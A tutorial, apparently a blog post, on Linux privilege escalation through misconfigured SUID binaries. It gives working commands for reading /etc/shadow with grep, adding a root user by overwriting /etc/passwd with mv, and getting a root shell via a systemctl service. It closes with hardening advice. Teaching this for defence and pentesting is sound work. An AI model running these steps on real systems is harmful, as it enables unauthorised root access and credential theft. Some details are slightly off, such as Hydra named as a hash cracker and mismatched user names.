Linux Privilege Escalation – SUID Binaries
Introduction
Linux has several access attributes that can allow users or groups to perform certain actions against files, such as execute, modify or view files.
SUID (Set User Identification) and GUID (Set Group Identification) are permissions that allow users to execute a binary or script with the permissions of its owner (SUID) or of its group (GUID).
Some binaries have this permission by default as they require to perform certain actions with elevated privileges, for example the passwd binary needs to run as root in order to change a user’s password, although certain binaries can be exploited to escalate privileges if they have the SUID bit set.
Finding Existing SUID Binaries
The following command can be used to identify any existing binaries that has the SUID or GUID permissions assigned to them:
find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000
The above uses the Linux find command, which is used to find files and directories, with the following flags:
- / to specify to start searching from the root directory
- -perm to find files that contains certain permissions, with -u=s for files owned by the root user and -4000/-2000/-6000 for files
- -type to specify the type of search (files, folders etc)
- 2>/dev/null to redirect errors to the black hole
Automated enumeration tools such as LinPEAS can also find SUID binaries:
The following command can be used to find if an individual binary has the SUID permission set:
ls -la path_to_binary
Identifying Vulnerable SUID Binaries
To identify if any of these can be exploited, GTFOBins can come in handy.
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. It allows to search for binaries or commands to check whether SUID permisions could allow to escalate privilege.
The search bar can be used to find the command and this will show ways to exploit such command. The “SUID” section is what this attack requires.
Automated enumeration tools such as LinPEAS can also flag vulnerable binaries:
Exploitation
Vulnerable SUID binaries can potentially be used to read or write to restricted files, upload/download files, execute commands as root or obtain a shell with elevated privileges.
Certain builtin Linux binaries can be easily exploited to gain a root shell:
- Nmap
- Find
- Vim
- Nano
- Bash
- Less/More
- Copy
SUID privileges on one of the above binaries almost always results in a full system compromise. This really exhaustive article explains in great detail how these can be exploited. A few more examples can be found below:
Example #1 – Grep (File Read)
Grep, a Linux command-line utility that uses regular expression to search in plain-text files, can be exploited to read restricted files:
./grep '' file_to_read
The example below demonstrates how the /etc/shadow file, which contains user hashes, can be viewed as a normal user:
Once extracted, the hashes could then be cracked using tools such as Hydra or John the Ripper:
john --wordlist=wordlist_file hashes_file
Example #2 – MV (File Write)
MV, a Linux command-line utility used to move files or directories, can be used to move files on top of existing ones, effectively overriding them.
This could be exploited by adding a new line to the /etc/passwd file, effectively adding a new user to the system.
Generating a new user hash with the following command:
openssl passwd -1 -salt salt password
Copying the /etc/passwd file to /tmp and adding a new line for a new “stefhacked” user using the generated hash, encoding dollar signs:
cd /tmp
cp /etc/passwd /tmp/passwd
echo "user:hash:0:0:Ubuntu,,,:/home/stef:/bin/bash" >> passwd
Replacing the /etc/passwd file with the new /tmp/passwd file and changing user to the newly created “stefhacked” user:
mv passwd /etc/passwd
su newuser
Example #3 – SystemCTL (Root Shell)
SystemCTL, a Linux software suite used to manage services, can be exploited by creating a service that, when started, will execute an arbitrary command as root. In the example below it will create a SUID copy of the /bin/bash binary, therefore allowing an attacker to execute bash as root:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/stef && chmod +s /tmp/stef"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/stef -p
Conclusion
Although SUID is necessary in Linux system to perform daily operations and is often useful for system administrators in order to allow regular users to execute certain binaries or commands, it can pose a huge security risk.
The SUID permission should not be applied to any binaries that have the ability to execute code or commands, read/write to files or create services.